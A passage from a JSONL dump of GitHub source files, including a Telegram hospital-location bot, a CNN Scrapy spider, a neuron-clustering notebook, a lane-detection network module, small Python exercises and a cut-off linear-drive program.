bboxes=list(np.reshape(bboxes,5))\r\n bboxes.pop()\r\n bboxes=[int(x) for x in bboxes ]\r\n a=bboxes.pop(0)\r\n bboxes.append(a)\r\n bboxes=[bboxes]\r\n box = [tuple(x) for x in bboxes]\r\n return face,box\r\n","repo_name":"grmos/Face-Recognition-for-Ar-smart-glasses-with-eye-tracker","sub_path":"face_alignment/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28042167316","text":"import json\n\nwith open(\"all_idioms.json\", 'r', encoding='utf-8') as file:\n idioms = tuple(json.load(file))\n\nunique = []\nfor phrase in idioms:\n dicts = [sem['dictionary'] for sem in phrase['semantics'] if 'dictionary' in sem]\n if len(dicts) == len(set(dicts)) and len(set(dicts)) > 1:\n unique.append(phrase)\n\nprint(len(unique))\n\nwith open('idioms_in_dicts.json', 'w', encoding='utf8') as fp:\n json.dump(unique, fp, ensure_ascii=False, indent=4)\n","repo_name":"katearb/idioms","sub_path":"collection_processing/get_uniques.py","file_name":"get_uniques.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74807876966","text":"from aiogram.dispatcher.filters import Text, Command\nfrom aiogram.types import ReplyKeyboardMarkup, ReplyKeyboardRemove, Message\nfrom loader import dp, bot\nfrom keyboards.default.shahar_shifoxona import shaharShifo\nfrom keyboards.default.menuKeyboard import menuStart\nfrom states.locstates import locstates\nfrom aiogram.dispatcher import FSMContext\n\n@dp.message_handler(text=\"NAMANGAN SHAHAR BOLALAR SHIFOXONASI\", state=\"*\")\nasync def send_agronam(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAODY7PgeEPKVG4N8qJrUvtzKeEr1IkAArHAMRsTBKFJUYd2M-OcX7UBAAMCAAN4AAMtBA'\n \n text = \"NAMANGAN SHAHAR BOLALAR SHIFOXONASI\\n\"\n text += \"Manzil: Go'zal dahasi 4-uy\\n\"\n text += \"Mo'ljal: Go'zal shifoxonasi orqasida\\n Tel: +998 69 237 16 48, +998 69 237 10 43\\n\"\n text += \"Ish tartibi: 24/7\"\n \n await message.answer_location(latitude=\"41.00796883587812\", longitude=\" 71.62345267916557\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n \n@dp.message_handler(text=\"NAMANGAN VILOYATINING YUQUMLI KASALLIKLAR SHIFOXONASI\", state=\"*\")\nasync def send_sanoat(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAICAAFjs-3qLQJdT53wFPYrdcCIfihjvQACr8AxGxMEoUmGWODg3mWa9QEAAwIAA3gAAy0E'\n \n text = \"NAMANGAN VILOYATINING YUQUMLI KASALLIKLAR SHIFOXONASI\\n\"\n text += \"Manzil: K.Otamirzayev ko'chasi 90-uy\\n\"\n text += \"Mo'ljal: Doctor A xususiy klinikasi\\nTel: +998 69 224 73 58, +998 69 224 69 15\\n\"\n text += \"Ish tartibi: 24/7\"\n \n await message.answer_location(latitude=\"40.99052274911174\", longitude=\"71.70909736965017\") \n await message.reply_photo(file_id, caption=text)\n await state.finish() \n\n@dp.message_handler(text=\"RESPUBLIKA IXTISOSLASHTIRILGAN AKUSHERLIK VA GINEKOLOGIYA ILMIY - AMALIY TIBBIYOT MARKAZINING NAMANGAN FILIALI\", state=\"*\")\nasync def send_ipa(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAICAmOz7q-dEpQD7rziz3mm8QGvKNU1AAKuwDEbEwShSeMcnOf57i9tAQADAgADbQADLQQ'\n \n text = \"Respublika Ixtisoslashtirilgan Akusherlik va Ginekologiya Ilmiy-Amaliy Tibbiyot Markazi Namangan Filiali\\n\"\n text += \"Manzil: Boburshox ko'chasi 143A-uy\\n\"\n text += \"Mo'ljal: Yuqumli kasalliklar shifoxonasi\\nTel: +998 69 239 38 03\\n\"\n text += \"Ish tartibi: Dushanbadan-Jumagacha 07:00-19:00, tushliksiz\"\n \n await message.answer_location(latitude=\"40.99535848695003\", longitude=\"71.64694200841065\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"NAMANGAN VILOYAT KO'P TARMOQLI TIBBIYOT MARKAZI\", state=\"*\")\nasync def send_hamkor(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIB5WOz7YyBRvHnmhfnFmWBPziix8dfAAKwwDEbEwShSZdycp0AASprrQEAAwIAA3kAAy0E'\n \n text = \"Namangan viloyat ko'p tarmoqli tibbiyot markazi\\n\"\n text += \"Manzil: Nomongoniy ko'chasi 9-uy\\n\"\n text += \"Mo'ljal: Sayhun mehmonxonasi\\nTel: +998 69 226 20 04, +998 69 226 36 00\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-18:00, tushliksiz\"\n \n await message.answer_location(latitude=\"41.00393608604384\", longitude=\"71.66104554126807\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"ANGIOMED\", state=\"*\")\nasync def send_asaka(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAN2Y7PgdVeL6gVp1LM66BEMahkbETwAAqXAMRsTBKFJAAE8C2H-sFFjAQADAgADeAADLQQ'\n \n text = \"ANGIOMED\\n\"\n text += \"Manzil: I.Karimov ko'chasi\\nTel: 
+998 78 888 00 01\\n\"\n text += \"Mo'ljal: Namangan mehmonxonasi, NBU bank oldida\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-18:00\"\n \n await message.answer_location(latitude=\"40.99625761004835\", longitude=\"71.58655921917563\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"Rano medical center\", state=\"*\")\nasync def send_infin(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIByGOz7J_NiUUyyNEZGijae-brSbz1AALNwDEbEwShSZMcdoMKIv1ZAQADAgADeAADLQQ'\n \n text = \"Rano medical center\\n\"\n text += \"Manzil: I.Karimov ko'chasi\\nTel: +998 69 232 90 09\\n\"\n text += \"Mo'ljal: Al-mashriq oshxonasi yonida\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-18:00\"\n \n await message.answer_location(latitude=\"40.99639110137484\", longitude=\"71.59026379416488\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"HABIB shifoxonasi\", state=\"*\")\nasync def send_trast(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIB42Oz7YNyr9cAAXVwRA9VTKHU55IVFQACz8AxGxMEoUlaoFyF8S2X-QEAAwIAA3gAAy0E'\n \n text = \"HABIB shifoxonasi\\n\"\n text += \"Manzil: Xotira ko'chasi 5-uy\\nTel: +998 90 555 52 25\\n\"\n text += \"Mo'ljal: 5-oila poliklinasi oldida\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-17:00\"\n \n await message.answer_location(latitude=\"41.00063794372812\", longitude=\"71.61002748966733\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"5-oila poliklinasi\", state=\"*\")\nasync def send_mikro(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIBxmOz69xtmNWu3EjITrxw_2v5-9-GAAKtwDEbEwShSVvGznXCO8VnAQADAgADeQADLQQ'\n \n text = \"5-oila poliklinasi\\n\"\n text += \"Manzil: Xotira ko'chasi 71A, 5A-kichik noxiya \\nTel: +998 69 232 50 71\\n\"\n text += \"Mo'ljal: Koson petak tarafda\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 08:00-20:00\"\n \n await message.answer_location(latitude=\"41.000552061203145\", longitude=\"71.61042198414846\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"Galomed\", state=\"*\")\nasync def send_ipak(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAANzY7PgdNYMb8q8Y-zz2tQDRv9AGJ4AAqTAMRsTBKFJTpIrB-oPCwQBAAMCAANtAAMtBA'\n \n text = \"Galomed\\n\"\n text += \"Manzil: 1-kichik noxiya, Sportchilar ko'chasi \\nTel: +998 95 307 00 70\\n\"\n text += \"Mo'ljal: 56-maktab oldida\\n\"\n text += \"Ish tartibi: Dushanbadan-Jumagacha 08:00-20:00\"\n \n await message.answer_location(latitude=\"41.003701653981\", longitude=\"71.59076202766865\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"\\\"ZZZ\\\" ko'z klinikasi\", state=\"*\")\nasync def send_nbu(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAMcY7PfV-iWrxClRzxhoJeO0c2UUQYAAo3AMRsTBKFJo0KrcOgQjmkBAAMCAAN5AAMtBA'\n \n text = \"\\\"ZZZ\\\" ko'z klinikasi\\n\"\n text += \"Manzil: 2-kichik noxiya \\n\"\n text += \"Mo'ljal: 1-shahar roddom, \\\"Navbahor\\\" stadioni \\nTel: +998 69 232 91 63\"\n text += \"Ish tartibi: Dushanbadan-Jumagacha 09:00-16:00, Shanba - 08:00-14:00\"\n \n await message.answer_location(latitude=\"41.000267811219075\", longitude=\"71.58959532489571\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n# @dp.message_handler(text=\"G'ishtli bolnitsa\", 
state=locstates.hospital)\n# async def send_nbu(message:Message, state=FSMContext):\n \n# file_id = ''\n \n# text = \"G'ishtli bolnitsa\\n\"\n# text += \"Manzil: 2-kichik noxiya\\n\"\n# text += \"Mo'ljal: \\\"ZZZ\\\" ko'z klinikasi oldida\\nTel: +998 -------\"\n# text += \"Ish tartibi: Dushanbadan-Shanbagacha 08:00-19:00\"\n \n# await message.answer_location(latitude=\"41.000591816121926\", longitude=\"71.5901996191277\") \n# await message.reply_photo(file_id, caption=text)\n# await state.finish()\n\n@dp.message_handler(text=\"👈 Ortga\", state=\"*\")\nasync def back_hos(message:Message, state=FSMContext):\n await message.answer(\"Ortga\", reply_markup=menuStart)\n await state.finish()\n\n","repo_name":"AzimjonNosirov/Bank-Bankomat-Shifoxona-Apteka-DXM-bot","sub_path":"handlers/users/hospitalHandler.py","file_name":"hospitalHandler.py","file_ext":"py","file_size_in_byte":7880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"2418418881","text":"# 202203071358\n# https://leetcode-cn.com/problems/letter-case-permutation/\n# 给定一个字符串 s ,通过将字符串 s 中的每个字母转变大小写,我们可以获得一个新的字符串。\n# 返回 所有可能得到的字符串集合 。以 任意顺序返回输出。\n# 例:\n# 输入:s = \"a1b2\"\n# 输出:[\"a1b2\", \"a1B2\", \"A1b2\", \"A1B2\"]\nfrom typing import List\n\n\nclass Solution:\n def letterCasePermutation(self, s: str) -> List[str]:\n res = []\n length = len(s)\n if not length:\n return [\"\"]\n\n def dfs(start, tmp):\n if start == length or len(tmp) == length:\n res.append(tmp)\n return\n if s[start].isdigit():\n dfs(start+1, tmp + s[start])\n elif s[start].islower():\n dfs(start+1, tmp + s[start])\n dfs(start+1, tmp + s[start].upper())\n elif s[start].isupper():\n dfs(start+1, tmp + s[start])\n dfs(start+1, tmp + s[start].lower())\n\n dfs(0, \"\")\n return res\n\n","repo_name":"alex-1q84/leetcode","sub_path":"python/src/leetcode/begin_algorithm/letter_case_permutation.py","file_name":"letter_case_permutation.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"75293407528","text":"\n'''The break statement'''\n# ‘break’ is used to come out of the loop when encountered. It instructs the program to – Exit the loop now.\n\n'''Example:'''\n\nfor i in range(0, 80):\n\tprint(i)\t#This will print 0, 1, 2 and 3\n\tif i == 3:\n\t\tbreak\n\n\n\n\n# Difference between else and break\nfor i in range(10):\n\tprint(i)\n\tif i==5:\n\t\tbreak\nelse:\n\tprint(\"this is inside else of for\")\t#not printed this hence so you see the loop isnt breaking after exhaustion by loop rather from break used \n","repo_name":"fykaa/Just-Learning-Python","sub_path":"34_break statment.py","file_name":"34_break statment.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"31656529222","text":"import scrapy\nimport re\nimport os.path\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.selector import HtmlXPathSelector\nfrom craigslist_sample.items import CNNItem\n\nclass MySpider(CrawlSpider):\n name = \"cnn\"\n allowed_domains = [\"cnn.com\"]\n start_urls = ['http://www.cnn.com/']\n \n base_url = 'http://www.cnn.com/sitemaps/sitemap-articles'\n year = ['2016','2015','2014','2013','2012','2011']\n month = ['12','11','10','09','08','07','06','05','04','03','02','01']\n \n def parse(self,response):\n for y in self.year:\n for m in self.month:\n url = self.base_url+'-'+y+'-'+m+'.xml'\n yield scrapy.Request(url,self.parseList)\n \n def parseList(self,response):\n nodename = 'loc'\n text = body_or_str(response)\n r = re.compile(r\"(<%s[\\s>])(.*?)(%s>)\" % (nodename, nodename), re.DOTALL)\n for match in r.finditer(text):\n url = match.group(2)\n yield scrapy.Request(url,self.parse_items)\n\n def parse_items(self, response):\n hxs = HtmlXPathSelector(response)\n items = []\n item = CNNItem()\n item[\"title\"] = hxs.select('//h1[@class=\"pg-headline\"]/text()').extract()\n item[\"article\"] = hxs.select('//div[@class=\"zn-body__paragraph\"]/text()').extract()\n item[\"link\"] = response.url\n items.append(item)\n splitUrl = response.url.split('/')\n year = splitUrl[3]\n month = splitUrl[4]\n day = splitUrl[5]\n name1 = item[\"title\"][0]\n name = \"\".join(re.findall(\"[a-zA-Z]+\", name1))\n article = \"\\n\".join(item['article'])\n save_path = os.path.join('data',year+\"-\"+month+\"-\"+day,name+\".txt\")\n if not os.path.exists(os.path.dirname(save_path)):\n try:\n os.makedirs(os.path.dirname(save_path))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n with open(save_path, 'a+') as f:\n f.write('name: {0} \\nlink: {1}\\n\\n {2}'.format(name, item['link'], article.encode('utf8')))\n return(items)\n","repo_name":"Helen-ChenHan/CNNnews","sub_path":"CNN/craigslist_sample/spiders/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3300730918","text":"# %% [markdown]\n# # THE MIND OF A MAGGOT\n\n# %% [markdown]\n# ## Imports\nimport os\nimport time\nimport warnings\n\nimport colorcet as cc\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms as transforms\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom anytree import LevelOrderGroupIter, NodeMixin\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.linalg import orthogonal_procrustes\nfrom scipy.optimize import linear_sum_assignment\nfrom sklearn.exceptions import ConvergenceWarning\nfrom sklearn.metrics import adjusted_rand_score\nfrom sklearn.utils.testing import ignore_warnings\nfrom tqdm import tqdm\n\nimport pymaid\nfrom graspy.cluster import GaussianCluster\nfrom graspy.embed import AdjacencySpectralEmbed, LaplacianSpectralEmbed, selectSVD\nfrom graspy.models import DCSBMEstimator, RDPGEstimator, SBMEstimator\nfrom graspy.plot import heatmap, pairplot\nfrom graspy.simulations import rdpg\nfrom graspy.utils import augment_diagonal, binarize, pass_to_ranks\nfrom src.cluster import (\n MaggotCluster,\n add_connections,\n compute_pairedness_bipartite,\n crossval_cluster,\n fit_and_score,\n get_paired_inds,\n make_ellipses,\n plot_cluster_pairs,\n plot_metrics,\n predict,\n)\nfrom src.data import load_metagraph\nfrom src.graph import MetaGraph, preprocess\nfrom src.hierarchy import signal_flow\nfrom src.io import savecsv, savefig\nfrom src.pymaid import start_instance\nfrom src.visualization import (\n CLASS_COLOR_DICT,\n adjplot,\n barplot_text,\n gridmap,\n matrixplot,\n set_axes_equal,\n stacked_barplot,\n)\n\nwarnings.filterwarnings(action=\"ignore\", category=ConvergenceWarning)\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\nrc_dict = {\n \"axes.spines.right\": False,\n \"axes.spines.top\": False,\n \"axes.formatter.limits\": (-3, 3),\n \"figure.figsize\": (6, 3),\n \"figure.dpi\": 100,\n}\nfor key, val in rc_dict.items():\n mpl.rcParams[key] = val\ncontext = sns.plotting_context(context=\"talk\", font_scale=1, rc=rc_dict)\nsns.set_context(context)\n\nPLOT_MODELS = True\n\nnp.random.seed(8888)\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=True, **kws)\n\n\ndef stashcsv(df, name, **kws):\n savecsv(df, name)\n\n\n# %% [markdown]\n# ## Load data\n# In this case we are working with `G`, the directed graph formed by summing the edge\n# weights of the 4 different graph types. Preprocessing here includes removing\n# partially differentiated cells, and cutting out the lowest 5th percentile of nodes in\n# terms of their number of incident synapses. 5th percentile ~= 12 synapses. 
After this,\n# the largest connected component is used.\n\nmg = load_metagraph(\"G\", version=\"2020-04-01\")\nmg = preprocess(\n mg,\n threshold=0,\n sym_threshold=False,\n remove_pdiff=True,\n binarize=False,\n weight=\"weight\",\n)\nmeta = mg.meta\n\n# plot where we are cutting out nodes based on degree\ndegrees = mg.calculate_degrees()\nfig, ax = plt.subplots(1, 1, figsize=(5, 2.5))\nsns.distplot(np.log10(degrees[\"Total edgesum\"]), ax=ax)\nq = np.quantile(degrees[\"Total edgesum\"], 0.05)\nax.axvline(np.log10(q), linestyle=\"--\", color=\"r\")\nax.set_xlabel(\"log10(total synapses)\")\n\n# remove low degree neurons\nidx = meta[degrees[\"Total edgesum\"] > q].index\nmg = mg.reindex(idx, use_ids=True)\n\n# remove center neurons # FIXME\nidx = mg.meta[mg.meta[\"hemisphere\"].isin([\"L\", \"R\"])].index\nmg = mg.reindex(idx, use_ids=True)\n\nmg = mg.make_lcc()\nmg.calculate_degrees(inplace=True)\nmeta = mg.meta\n\nadj = mg.adj\nmeta[\"inds\"] = range(len(meta))\n\n# %% [markdown]\n# ##\n# param_grid = {\n# \"embed\": [\"ase\", \"unscaled_ase\", \"lse\"],\n# \"realign\": [True, False],\n# \"reembed\": [True, False],\n# \"metric\": [\"ARI\", \"bic\", \"lik\"],\n# }\nparam_grid = {\n \"embed\": [\"ase\"],\n \"realign\": [False],\n \"reembed\": [False],\n \"metric\": [\"bic\"],\n}\n\nfrom sklearn.model_selection import ParameterGrid\n\nparams = list(ParameterGrid(param_grid))\nn_levels = 7\n\nmcs = []\nfor p in params:\n metric = p[\"metric\"]\n embed = p[\"embed\"]\n realign = p[\"realign\"]\n reembed = p[\"reembed\"]\n basename = f\"-{p}\".replace(\" \", \"\")\n basename = basename.replace(\":\", \"=\")\n basename = basename.replace(\",\", \"-\")\n basename = basename.replace(\"'\", \"\")\n print(basename)\n\n np.random.seed(8888)\n\n mc = MaggotCluster(\n \"0\",\n adj=adj,\n meta=meta,\n n_init=25,\n stashfig=stashfig,\n min_clusters=2,\n max_clusters=3,\n n_components=4,\n embed=embed,\n realign=realign,\n reembed=reembed,\n )\n\n for i in range(n_levels):\n for j, node in enumerate(mc.get_lowest_level()):\n node.fit_candidates(plot_metrics=False)\n for j, node in enumerate(mc.get_lowest_level()):\n node.select_model(2, metric=metric)\n mc.collect_labels()\n\n fig, axs = plt.subplots(1, n_levels, figsize=(10 * n_levels, 30))\n for i in range(n_levels):\n ax = axs[i]\n stacked_barplot(\n mc.meta[f\"lvl{i}_labels_side\"],\n mc.meta[\"merge_class\"],\n category_order=np.unique(mc.meta[f\"lvl{i}_labels_side\"].values),\n color_dict=CLASS_COLOR_DICT,\n norm_bar_width=False,\n ax=ax,\n )\n ax.set_yticks([])\n ax.get_legend().remove()\n\n stashfig(f\"count-barplot-lvl{i}\" + basename)\n plt.close()\n\n fig, axs = plt.subplots(1, n_levels, figsize=(10 * n_levels, 30))\n for i in range(n_levels):\n ax = axs[i]\n stacked_barplot(\n mc.meta[f\"lvl{i}_labels_side\"],\n mc.meta[\"merge_class\"],\n category_order=np.unique(mc.meta[f\"lvl{i}_labels_side\"].values),\n color_dict=CLASS_COLOR_DICT,\n norm_bar_width=True,\n ax=ax,\n )\n ax.set_yticks([])\n ax.get_legend().remove()\n\n stashfig(f\"prop-barplot-lvl{i}\" + basename)\n plt.close()\n\n for i in range(n_levels):\n fig, ax = plt.subplots(1, 1, figsize=(20, 20))\n adjplot(\n adj,\n meta=mc.meta,\n sort_class=f\"lvl{i}_labels_side\",\n item_order=\"merge_class\",\n plot_type=\"scattermap\",\n sizes=(0.5, 1),\n ticks=False,\n colors=\"merge_class\",\n ax=ax,\n palette=CLASS_COLOR_DICT,\n gridline_kws=dict(linewidth=0.2, color=\"grey\", linestyle=\"--\"),\n )\n stashfig(f\"adj-lvl{i}\" + basename)\n\n mcs.append(mc)\n\n\n# %%\nnodes = 
mc.get_lowest_level()\ncounts = []\nfor n in nodes:\n print(len(n.meta))\n counts.append(len(n.meta))\ncounts = np.array(counts)\nbig = np.max(counts)\nbig_ind = np.where(counts == big)[0][0]\n\n# %% [markdown]\n# ##\nnode = nodes[big_ind]\n\n# get number that are paired\nnode.meta[node.meta[\"Pair\"].isin(node.meta.index)]\n# 52 / 215 have a pair here\n\n# get degrees\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total edgesum\"], ax=ax)\nsns.distplot(meta[\"Total edgesum\"], ax=ax)\nstashfig(\"big-guy-edgesum-joint\")\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total degree\"], ax=ax)\nsns.distplot(meta[\"Total degree\"], ax=ax)\nstashfig(\"big-guy-degree-joint\")\n\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total edgesum\"], ax=ax)\nstashfig(\"big-guy-edgesum\")\n\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total degree\"], ax=ax)\nstashfig(\"big-guy-degree\")\n\n# %% [markdown]\n# ##\nfrom src.visualization import plot_neurons\n\n\nstart_instance()\nkey = \"lvl6_labels\"\nfor tp in np.unique(mc.meta[key]):\n plot_neurons(mc.meta, key, tp)\n stashfig(f\"neurons-{key}-{tp}\")\n plt.close()\n\n","repo_name":"neurodata/maggot_models","sub_path":"notebooks/127.2-BDP-more-silly-model.py","file_name":"127.2-BDP-more-silly-model.py","file_ext":"py","file_size_in_byte":7618,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"30557319945","text":"import torch.nn as nn\nimport torch\nimport torch.nn.functional as F\n\n\nclass RESA(nn.Module):\n def __init__(self):\n super(RESA, self).__init__()\n self.iter = 5 # 5\n chan = 128 # 128\n fea_stride = 8 # 原图相对于此时的特征图大小的倍数\n self.height = 720 // fea_stride # 46\n self.width = 1280 // fea_stride # 80\n self.alpha = 2 # 2\n conv_stride = 9 # 9\n\n for i in range(self.iter):\n conv_vert1 = nn.Conv2d(chan, chan, (1, conv_stride),padding=(0, conv_stride//2), groups=1, bias=False)\n conv_vert2 = nn.Conv2d(chan, chan, (1, conv_stride),padding=(0, conv_stride//2), groups=1, bias=False)\n\n setattr(self, 'conv_d'+str(i), conv_vert1)\n setattr(self, 'conv_u'+str(i), conv_vert2)\n\n conv_hori1 = nn.Conv2d(chan, chan, (conv_stride, 1),padding=(conv_stride//2, 0), groups=1, bias=False)\n conv_hori2 = nn.Conv2d(chan, chan, (conv_stride, 1),padding=(conv_stride//2, 0), groups=1, bias=False)\n\n setattr(self, 'conv_r'+str(i), conv_hori1)\n setattr(self, 'conv_l'+str(i), conv_hori2)\n\n idx_d = (torch.arange(self.height) + self.height //2**(self.iter - i)) % self.height\n setattr(self, 'idx_d'+str(i), idx_d)\n\n idx_u = (torch.arange(self.height) - self.height //2**(self.iter - i)) % self.height\n setattr(self, 'idx_u'+str(i), idx_u)\n\n idx_r = (torch.arange(self.width) + self.width //2**(self.iter - i)) % self.width\n setattr(self, 'idx_r'+str(i), idx_r)\n\n idx_l = (torch.arange(self.width) - self.width //2**(self.iter - i)) % self.width\n setattr(self, 'idx_l'+str(i), idx_l)\n\n def forward(self, x):\n x = x.clone()\n\n for direction in ['d', 'u']:\n for i in range(self.iter):\n conv = getattr(self, 'conv_' + direction + str(i))\n idx = getattr(self, 'idx_' + direction + str(i))\n x.add_(self.alpha * F.relu(conv(x[..., idx, :])))\n\n for direction in ['r', 'l']:\n for i in range(self.iter):\n conv = getattr(self, 'conv_' + direction + str(i))\n idx = getattr(self, 'idx_' + direction + str(i))\n x.add_(self.alpha * F.relu(conv(x[..., idx])))\n\n return x\n\n\n\nif __name__ == \"__main__\":\n import torch\n img = torch.rand(1, 128, 90, 160).cuda()\n model = RESA().cuda()\n output = model(img)\n print(output.size)\n\n\n# fea torch.Size([4, 128, 46, 80])\n# resa torch.Size([4, 128, 46, 80])\n# seg torch.Size([4, 7, 368, 640])\n# exist torch.Size([4, 6])\n","repo_name":"033186ZSY/RLSNet-master","sub_path":"rlsnet/resa.py","file_name":"resa.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"416421459","text":"import os\nimport click\nfrom PyInquirer import prompt\n\nfrom distutils.dir_util import copy_tree, remove_tree\nfrom malas_path import config_path, malas_path\n\nquestions = [\n # Learn more in https://github.com/CITGuru/PyInquirer#question-types\n {\n 'type': 'confirm',\n 'name': 'confirmation',\n 'message': 'Configuration already exist, reset to factory?',\n 'default': True\n },\n {\n 'type': 'confirm',\n 'name': 'keep_config',\n 'message': 'Keep config?',\n 'default': True\n },\n\n]\n\n@click.command()\ndef initial():\n \"\"\"\n Initialize folder and other\n \"\"\"\n replace = True\n keep_config = False\n\n if os.path.isdir(config_path):\n answer = prompt(questions)\n replace = answer.get('confirmation')\n keep_config = answer.get('keep_config')\n\n if replace:\n if os.path.isdir(f'{config_path}/config'):\n copy_tree(src=f'{config_path}/config', dst=f'{config_path}/config_backup')\n remove_tree(f'{config_path}/config')\n\n folders = ['config', 'plugins']\n for folder in folders:\n os.makedirs(f'{config_path}/{folder}', exist_ok=True)\n\n copy_tree(src=f'{malas_path}/malas_config/', dst=config_path)\n\n if keep_config:\n copy_tree(src=f'{config_path}/config_backup', dst=f'{config_path}/config')\n remove_tree(f'{config_path}/config_backup')\n\n click.echo(f\"Creating configuration folder in {config_path}\")\n else:\n click.echo(\"Nothing change\")\n","repo_name":"tegarimansyah/malas-cli","sub_path":"malas-cli/malas_init.py","file_name":"malas_init.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"16506645697","text":"def diccionario_geringoso(listaDePalabras):\n diccionario={}\n for cadena in listaDePalabras:\n cadenaFinal=''\n for c in cadena:\n cadenaFinal+=c\n if c=='a':\n cadenaFinal+= 'pa'\n elif c=='e':\n cadenaFinal+= 'pe'\n elif c=='i':\n cadenaFinal+= 'pi'\n elif c=='o':\n cadenaFinal+= 'po'\n elif c=='u':\n cadenaFinal+= 'pu'\n \n diccionario[cadena]=cadenaFinal\n return diccionario \n\nlista=['banana', 'manzana', 'mandarina']\nprint(diccionario_geringoso(lista))\n","repo_name":"CristianAmici/python","sub_path":"clase02/diccionario_geringoso.py","file_name":"diccionario_geringoso.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"2186468294","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\na, b = map(int, input().split())\r\nc, d = map(int, input().split())\r\nprime = [1] * 1001\r\n\r\nfor i in range(2, int((1000)**0.5)+1):\r\n if prime[i] == 1:\r\n for j in range(i+i, 1001, i):\r\n prime[j] = 0\r\n\r\nif b >= c:\r\n tmp = sum(prime[c:b+1])\r\nelse:\r\n tmp = 0\r\n\r\nyt = sum(prime[a:b+1]) - tmp\r\nyj = sum(prime[c:d+1]) - tmp\r\n\r\nif tmp % 2 == 0:\r\n if yt > yj:\r\n print(\"yt\")\r\n else:\r\n print(\"yj\")\r\nelse:\r\n if yt >= yj:\r\n print(\"yt\")\r\n else:\r\n print(\"yj\")","repo_name":"rloldl-c/algorithm","sub_path":"백준/Silver/25632. 소수 부르기 게임/소수 부르기 게임.py","file_name":"소수 부르기 게임.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"14859459098","text":"import math\nfrom technosoftlineardrive.tml import *\nimport struct\n\nSERVO_DEFAULT_ACCELERATION = 0.1751 # IU\nSERVO_DEFAULT_SPEED = 31.831 # IU\n\nMAX_ACCELERATION = 0.3 # IU\nMAX_SPEED = 170 # IU\n\n# Here be some dragons. Kind and friendly dragons, but dragons nonetheless.\n\ndef create_linear_drive_program(pos_amount,\n acceleration=SERVO_DEFAULT_ACCELERATION,\n speed=SERVO_DEFAULT_SPEED):\n \"\"\"\n Create a assembly tml program for the linear drive.\n \n :param pos_amount: amount to move linear drives position relatively.\n :param acceleration: how fast the linear drive will accelerate to it's desired speed.\n :param speed: how fast the linear drive will move to desired position.\n :return assemble_program: a complete assembly program to run on the linear drive.\n \"\"\"\n assert (acceleration <= MAX_ACCELERATION)\n assert (speed <= MAX_SPEED)\n\n def pack_int(num):\n \"\"\"\n 